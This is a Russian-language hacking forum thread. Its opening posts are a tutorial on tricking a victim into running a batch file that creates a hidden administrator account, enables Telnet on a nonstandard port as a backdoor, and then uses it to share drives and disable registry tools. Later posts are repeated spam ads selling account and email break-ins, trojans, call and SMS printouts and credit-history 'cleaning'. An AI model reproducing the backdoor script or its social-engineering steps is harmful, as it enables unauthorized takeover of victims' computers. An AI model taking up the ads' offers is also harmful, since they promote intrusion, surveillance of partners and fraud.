|
Взлом через TELNET
| |
| ADMIRAL-XACK | Дата: Понедельник, 30.11.2009, 17:23 | Сообщение # 1 |
Группа: Заблокированые
Сообщений: 24
| Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет. Телнет - сетевой протокол для работы в удаленной системе в терминальном
режиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам. Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у
жертвы. Бывает такое, что этот сервис уже будет весить у "врага", но при попытки
подключится 90% того, что он потребует пасс, можно конечно попробовать брутить,
но вероятность успеха очень маленькая. Для взлома можно воспользоваться таким
методом как социальная инженерия(СИ). Я думаю не надо объяснять что это такое.
Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этот
метод в данном случае наиболее актуален.
Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый
тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе
порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто
написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной
строки).
тело батника: chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet все это пишешь в блокноте, и сохраняем как *.bat
|
| |
| |
| ADMIRAL-XACK | Дата: Понедельник, 30.11.2009, 17:23 | Сообщение # 2 |
|
Группа: Заблокированые
Сообщений: 24
| Теперь пояснения:
chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.
net user SUPPORT_388945a0 /delete и
net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную
первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.
net user hacker hack /add и
net localgroup Администраторы hacker /add - не трудно догадаться, что этими
командами создаётся новая учетная запись с админскими правами,
где логин: hacker
пасс: hack
Так как при создании нового админа он будет виден в welcome screen'е, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"hacker"=dword:00000000
Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start=
auto которая
меняет тип его запуска на автоматический(по дефолту disabled ).
При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это
палевно, поэтому советую прописывать этой командой tlntadmn config port=972
sec=-NTLM , редко используемый порт. В нашем случае это 972.
Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet
окончательно запустит наш бэкдор.
клиент который находится тут c:WINDOWSsystem32telnet.exe.
Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]
если пишет:
Welcome to Microsoft Telnet Service
login:_
то всё акей =))
Вводишь:
login: hacker
password: hack
Появляется надпись:
*=====================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=====================================================
C:>_ Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять кампом, отдавая команды...
Можно к примеру расшарить диски: C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul перезагрузить комп:
C:>shutdown -r -t 1 -c -f прописать какой-нибудь ключ реестра:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v
DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему или поднять ftp сервер и залить радмина для более удобного удаленного
администрирования:
C:>ftp
В общем-то, здесь уже играет фантазия взломщика =) Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире. На все непонятные термины и выражения есть Гугл. Внимание!!! Данная статья - это не побуждение к действию, все описанное здесь
попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей
информационной безопасности
|
| |
| |
| anonimvladimir1 | Дата: Понедельник, 12.12.2016, 20:27 | Сообщение # 3 |
|
Группа: Новички
Сообщений: 206
| Услуги Профессиональных хакеров
ломаем любые страницы вконтакте, одноклассники
и многое другое.
- Так же ломаем:
- Instagram
- Viber
- Whatsapp
- Telegram
- ICQ
ВЗЛОМ ПОЧТЫ.
• @mail.ru
• @inbox.ru
• @list.ru
• @bk.ru
• @yandex.ru
• @rambler.ru
• @gmail.ru
и т.д
Гарантируется:
-полная анонимность
-100% доказательства,
-быстрое и качественное выполнение работы.
-Вы всегда можете ЗАКАЗАТЬ ДАННУЮ УСЛУГУ взлома, достаточно знать URL или id страницы;
-Так же есть возможность удаления ваших сведений в базе данных кредитных историй
-Распечатка с номеров смс+звонки
- Продаем вирусы и трояны.
- Удаленно взломаем любой компьютер и получим доступ к любым данным и информации на компьютере.
- Приемлемые цены
Работаем 24 часа в сутки.
Контакты:
E-mail: account.attacker@yandex.ru
Icq: 666971704
Skype: account.attacker
.
.
.
.
.
.
.
.
.
.
.
.
Услуги Профессиональных хакеров
ломаем любые страницы вконтакте, одноклассники
и многое другое.
- Так же ломаем:
- Instagram
- Viber
- Whatsapp
- Telegram
- ICQ
ВЗЛОМ ПОЧТЫ.
• @mail.ru
• @inbox.ru
• @list.ru
• @bk.ru
• @yandex.ru
• @rambler.ru
• @gmail.ru
и т.д
Гарантируется:
-полная анонимность
-100% доказательства,
-быстрое и качественное выполнение работы.
-Вы всегда можете ЗАКАЗАТЬ ДАННУЮ УСЛУГУ взлома, достаточно знать URL или id страницы;
-Так же есть возможность удаления ваших сведений в базе данных кредитных историй
-Распечатка с номеров смс+звонки
- Продаем вирусы и трояны.
- Удаленно взломаем любой компьютер и получим доступ к любым данным и информации на компьютере.
- Приемлемые цены
Работаем 24 часа в сутки.
Контакты:
E-mail: account.attacker@yandex.ru
Icq: 666971704
Skype: account.attacker
|
| |
| |
| prohorov2017 | Дата: Пятница, 20.01.2017, 09:38 | Сообщение # 4 |
|
Группа: Новички
Сообщений: 89
| Хотите узнать с кем общается Ваша половинка в интернете?
Желаете всегда быть в курсе дел Ваших конкурентов?
Нужно узнать секреты или поймать на лжи?
Тогда наш сервис для Вас!
Мы можем подобрать для Вас пароль к
следующим электронным почтовым ящикам:
mail.ru
list.ru
inbox.ru
bk.ru
rambler.ru
yandex.ru
gmail.com
ukr.net
yahoo.com
hotmail.com
qip-pochta
mamba.ru
loveplanet.ru
и т.д
Так же осуществляется взлом соц.сетей:
odnoklassniki.ru
vkontakte.ru
и т.д.
Есть возможность взлома многих других сервисов
(Viber, Instagram, WhatsApp...)
Распечатки звонков и смс Российских операторов.
!!! Очистка кредитной истории надёжно, 100% результат. Работаем дистанционно со всеми регионами России. Удаляем как закрытые, так и открытые просрочки.
Есть возможность создания положительной кредитной истории в БКИ. !!!!
- Разумные цены
- Кратчайшие сроки выполнения (не более дня)
- Соблюдается анонимность и конфиденциальность
- Пароль остается неизменным и хозяин почты
не заподозрит, что его почта просматривается
- Индивидуальный подход к каждому клиенту
- Работаем практически круглосуточно и БЕЗ выходных
- 50% скидки постоянным клиентам
Профессиональное обучение взлому, результат успешного обучения 100%.
Также вернем Ваш ящик, если его взломали и поменяли пароль
Наш сервис - действительно лучший.
Не теряйте времени, пишите прямо сейчас! Уверен, вы не пожалеете…
E-mail: powerofhack@yahoo.com
Icq: 692753919
Skype: powerofhack
Telegram: @powerofhack
https://vk.com/id331253358
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
Хотите узнать с кем общается Ваша половинка в интернете?
Желаете всегда быть в курсе дел Ваших конкурентов?
Нужно узнать секреты или поймать на лжи?
Тогда наш сервис для Вас!
Мы можем подобрать для Вас пароль к
следующим электронным почтовым ящикам:
mail.ru
list.ru
inbox.ru
bk.ru
rambler.ru
yandex.ru
gmail.com
ukr.net
yahoo.com
hotmail.com
qip-pochta
mamba.ru
loveplanet.ru
и т.д
Так же осуществляется взлом соц.сетей:
odnoklassniki.ru
vkontakte.ru
и т.д.
Есть возможность взлома многих других сервисов
(Viber, Instagram, WhatsApp...)
Распечатки звонков и смс Российских операторов.
!!! Очистка кредитной истории надёжно, 100% результат. Работаем дистанционно со всеми регионами России. Удаляем как закрытые, так и открытые просрочки.
Есть возможность создания положительной кредитной истории в БКИ. !!!!
- Разумные цены
- Кратчайшие сроки выполнения (не более дня)
- Соблюдается анонимность и конфиденциальность
- Пароль остается неизменным и хозяин почты
не заподозрит, что его почта просматривается
- Индивидуальный подход к каждому клиенту
- Работаем практически круглосуточно и БЕЗ выходных
- 50% скидки постоянным клиентам
Профессиональное обучение взлому, результат успешного обучения 100%.
Также вернем Ваш ящик, если его взломали и поменяли пароль
Наш сервис - действительно лучший.
Не теряйте времени, пишите прямо сейчас! Уверен, вы не пожалеете…
E-mail: powerofhack@yahoo.com
Icq: 692753919
Skype: powerofhack
Telegram: @powerofhack
https://vk.com/id331253358
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
E-mail: powerofhack@yahoo.com
Icq: 692753919
Skype: powerofhack
Telegram: @powerofhack
https://vk.com/id331253358
|
| |
| |
|
